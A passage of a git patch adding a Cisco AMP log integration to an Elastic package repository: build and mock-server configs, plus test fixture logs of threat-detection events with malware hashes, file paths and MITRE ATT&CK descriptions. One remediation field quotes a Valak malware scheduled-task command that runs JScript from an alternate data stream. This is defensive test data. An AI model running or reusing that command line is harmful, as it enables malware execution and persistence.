From 300d8eb0c771af4893e5da5797e4ffe95da35e2f Mon Sep 17 00:00:00 2001
From: Alex Resnick <adr8292@gmail.com>
Date: Sun, 12 Sep 2021 19:46:52 +0000
Subject: [PATCH] #1624: Add Cisco AMP package

---
 packages/cisco_amp/_dev/build/build.yml       |    3 +
 packages/cisco_amp/_dev/build/docs/README.md  |   16 +
 .../_dev/deploy/docker/docker-compose.yml     |   14 +
 .../_dev/deploy/docker/files/config.yml       |   30 +
 packages/cisco_amp/changelog.yml              |    6 +
 .../_dev/test/pipeline/cisco_amp2.ndjson.log  |   42 +
 .../cisco_amp2.ndjson.log-expected.json       | 3840 ++++++++
 .../_dev/test/pipeline/cisco_amp3.ndjson.log  |   45 +
 .../cisco_amp3.ndjson.log-expected.json       | 3825 ++++++++
 .../_dev/test/pipeline/cisco_amp4.ndjson.log  |  100 +
 .../cisco_amp4.ndjson.log-expected.json       | 8107 +++++++++++++++++
 .../_dev/test/pipeline/cisco_amp5.ndjson.log  |   62 +
 .../cisco_amp5.ndjson.log-expected.json       | 5084 +++++++++++
 .../_dev/test/pipeline/cisco_amp6.ndjson.log  |   53 +
 .../cisco_amp6.ndjson.log-expected.json       | 4310 +++++++++
 .../_dev/test/pipeline/cisco_amp7.ndjson.log  |   49 +
 .../cisco_amp7.ndjson.log-expected.json       | 3968 ++++++++
 .../test/pipeline/test-cisco_amp1.ndjson.log  |   49 +
 .../test-cisco_amp1.ndjson.log-expected.json  | 4041 ++++++++
 .../_dev/test/pipeline/test-common-config.yml |    5 +
 .../_dev/test/system/test-default-config.yml  |   10 +
 .../log/agent/stream/httpjson.yml.hbs         |   71 +
 .../elasticsearch/ingest_pipeline/default.yml |  475 +
 .../data_stream/log/fields/agent.yml          |  198 +
 .../data_stream/log/fields/base-fields.yml    |   46 +
 .../cisco_amp/data_stream/log/fields/ecs.yml  |   84 +
 .../data_stream/log/fields/fields.yml         |  292 +
 .../cisco_amp/data_stream/log/manifest.yml    |   92 +
 .../data_stream/log/sample_event.json         |   75 +
 packages/cisco_amp/docs/README.md             |  236 +
 packages/cisco_amp/img/cisco.svg              |    1 +
 packages/cisco_amp/manifest.yml               |   28 +
 32 files changed, 35257 insertions(+)
 create mode 100644 packages/cisco_amp/_dev/build/build.yml
 create mode 100644 packages/cisco_amp/_dev/build/docs/README.md
 create mode 100644 packages/cisco_amp/_dev/deploy/docker/docker-compose.yml
 create mode 100644 packages/cisco_amp/_dev/deploy/docker/files/config.yml
 create mode 100644 packages/cisco_amp/changelog.yml
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-common-config.yml
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/system/test-default-config.yml
 create mode 100644 packages/cisco_amp/data_stream/log/agent/stream/httpjson.yml.hbs
 create mode 100644 packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml
 create mode 100644 packages/cisco_amp/data_stream/log/fields/agent.yml
 create mode 100644 packages/cisco_amp/data_stream/log/fields/base-fields.yml
 create mode 100644 packages/cisco_amp/data_stream/log/fields/ecs.yml
 create mode 100644 packages/cisco_amp/data_stream/log/fields/fields.yml
 create mode 100644 packages/cisco_amp/data_stream/log/manifest.yml
 create mode 100644 packages/cisco_amp/data_stream/log/sample_event.json
 create mode 100644 packages/cisco_amp/docs/README.md
 create mode 100644 packages/cisco_amp/img/cisco.svg
 create mode 100644 packages/cisco_amp/manifest.yml

diff --git a/packages/cisco_amp/_dev/build/build.yml b/packages/cisco_amp/_dev/build/build.yml
new file mode 100644
index 00000000000..a138b554aa0
--- /dev/null
+++ b/packages/cisco_amp/_dev/build/build.yml
@@ -0,0 +1,3 @@
+dependencies:
+  ecs:
+    reference: git@1.11
diff --git a/packages/cisco_amp/_dev/build/docs/README.md b/packages/cisco_amp/_dev/build/docs/README.md
new file mode 100644
index 00000000000..2d934ee3a94
--- /dev/null
+++ b/packages/cisco_amp/_dev/build/docs/README.md
@@ -0,0 +1,16 @@
+# Cisco AMP Integration
+
+This integration is for Cisco AMP logs. It includes the following
+datasets for receiving logs over syslog or read from a file:
+
+- `log` dataset: supports Cisco AMP logs.
+
+## Logs
+
+### AMP
+
+The `log` dataset collects Cisco AMP logs.
+
+{{event "log"}}
+
+{{fields "log"}}
diff --git a/packages/cisco_amp/_dev/deploy/docker/docker-compose.yml b/packages/cisco_amp/_dev/deploy/docker/docker-compose.yml
new file mode 100644
index 00000000000..a438beca546
--- /dev/null
+++ b/packages/cisco_amp/_dev/deploy/docker/docker-compose.yml
@@ -0,0 +1,14 @@
+version: '2.3'
+services:
+  amp:
+    image: docker.elastic.co/observability/stream:v0.5.0
+    ports:
+      - 8080
+    volumes:
+      - ./files:/files:ro
+    environment:
+      PORT: 8080
+    command:
+      - http-server
+      - --addr=:8080
+      - --config=/files/config.yml
diff --git a/packages/cisco_amp/_dev/deploy/docker/files/config.yml b/packages/cisco_amp/_dev/deploy/docker/files/config.yml
new file mode 100644
index 00000000000..12dfd297f2c
--- /dev/null
+++ b/packages/cisco_amp/_dev/deploy/docker/files/config.yml
@@ -0,0 +1,30 @@
+rules:
+  - path: /v1/events
+    methods: ["GET"]
+    request_headers:
+      authorization: Basic YWJjZC1hYmNkOnh4eHh4eHh4eHg=
+    query_params:
+      offset: "{offset:.*}"
+      limit: "{limit:.*}"
+      start_date: "{start_date:.*}"
+    responses:
+      - status_code: 200
+        body: |-
+          {
+            "version": "v1.2.0",
+            "metadata": {
+              "links": {
+                "self": "http://{{ hostname }}:{{ env "PORT" }}/v1/events?limit={{ .request.vars.limit }}&offset=limit={{ .request.vars.offset }}",
+              },
+              "results": {
+                "total": 4,
+                "current_item_count": 1,
+                "index": 0,
+                "items_per_page": 1
+              }
+            },
+            "data": [
+              {"id":6180352115244794000,"timestamp":1582222838,"timestamp_nanoseconds":279000000,"date":"2020-02-20T18:20:38+00:00","event_type":"ThreatDetected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"20a0ce9f-44d1-4cbb-ab04-8a0705448b72","group_guids":["6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"],"severity":"Medium","computer":{"connector_guid":"20a0ce9f-44d1-4cbb-ab04-8a0705448b72","hostname":"Demo_Upatre","external_ip":"69.226.122.127","user":"A@TEMPLATE-W7X86","active":true,"network_addresses":[{"ip":"230.122.135.241","mac":"3f:1e:b2:28:25:24"}],"links":{"computer":"https://api.amp.cisco.com/v1/computers/20a0ce9f-44d1-4cbb-ab04-8a0705448b72","trajectory":"https://api.amp.cisco.com/v1/computers/20a0ce9f-44d1-4cbb-ab04-8a0705448b72/trajectory","group":"https://api.amp.cisco.com/v1/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}},
+              {"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"ThreatDetected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}
+            ]
+          }
diff --git a/packages/cisco_amp/changelog.yml b/packages/cisco_amp/changelog.yml
new file mode 100644
index 00000000000..0b98c79f61c
--- /dev/null
+++ b/packages/cisco_amp/changelog.yml
@@ -0,0 +1,6 @@
+# newer versions go on top
+- version: "0.0.1"
+  changes:
+    - description: Initial migration from Filebeat Module
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log
new file mode 100644
index 00000000000..ae6c21d78ff
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log
@@ -0,0 +1,42 @@
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n    - Review all activity performed by the user\r\n    - Upload any suspicious files to ThreatGrid for analysis\r\n    - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n    - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"<p>The adversary is trying to avoid being detected.</p>\n\n<p>Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.</p>\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"<p>Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.</p>\n\n<p>Adversaries may do this using a <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a>, such as <a href=\"https://attack.mitre.org/software/S0106\">cmd</a>, which has functionality to interact with the file system to gather information. Some adversaries may also use <a href=\"https://attack.mitre.org/techniques/T1119\">Automated Collection</a> on the local system.</p>\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"<p>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)</p>\n\n<p>Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).</p>\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"<p><strong>This technique has been deprecated. Please use <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a> where appropriate.</strong></p>\n\n<p>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and <a href=\"https://attack.mitre.org/techniques/T1086\">PowerShell</a> but could also be in the form of command-line batch scripts.</p>\n\n<p>Scripts can be embedded inside Office documents as macros that can be set to execute when files used in <a href=\"https://attack.mitre.org/techniques/T1193\">Spearphishing Attachment</a> and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through <a href=\"https://attack.mitre.org/techniques/T1203\">Exploitation for Client Execution</a>, where adversaries will rely on macros being allowed or that the user will accept to activate them.</p>\n\n<p>Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</p>\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"<p>The adversary is trying to avoid being detected.</p>\n\n<p>Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.</p>\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"<p>Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.</p>\n\n<p>Adversaries may do this using a <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a>, such as <a href=\"https://attack.mitre.org/software/S0106\">cmd</a>, which has functionality to interact with the file system to gather information. Some adversaries may also use <a href=\"https://attack.mitre.org/techniques/T1119\">Automated Collection</a> on the local system.</p>\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"<p>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)</p>\n\n<p>Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).</p>\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"<p><strong>This technique has been deprecated. Please use <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a> where appropriate.</strong></p>\n\n<p>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and <a href=\"https://attack.mitre.org/techniques/T1086\">PowerShell</a> but could also be in the form of command-line batch scripts.</p>\n\n<p>Scripts can be embedded inside Office documents as macros that can be set to execute when files used in <a href=\"https://attack.mitre.org/techniques/T1193\">Spearphishing Attachment</a> and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through <a href=\"https://attack.mitre.org/techniques/T1203\">Exploitation for Client Execution</a>, where adversaries will rely on macros being allowed or that the user will accept to activate them.</p>\n\n<p>Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</p>\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180352115244794000,"timestamp":1610709638,"timestamp_nanoseconds":279000000,"date":"2021-01-15T11:20:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159258594551267000,"timestamp":1610707507,"timestamp_nanoseconds":525000000,"date":"2021-01-15T10:45:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159258594551267599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iodnxvg.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55810,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55805,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55809,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
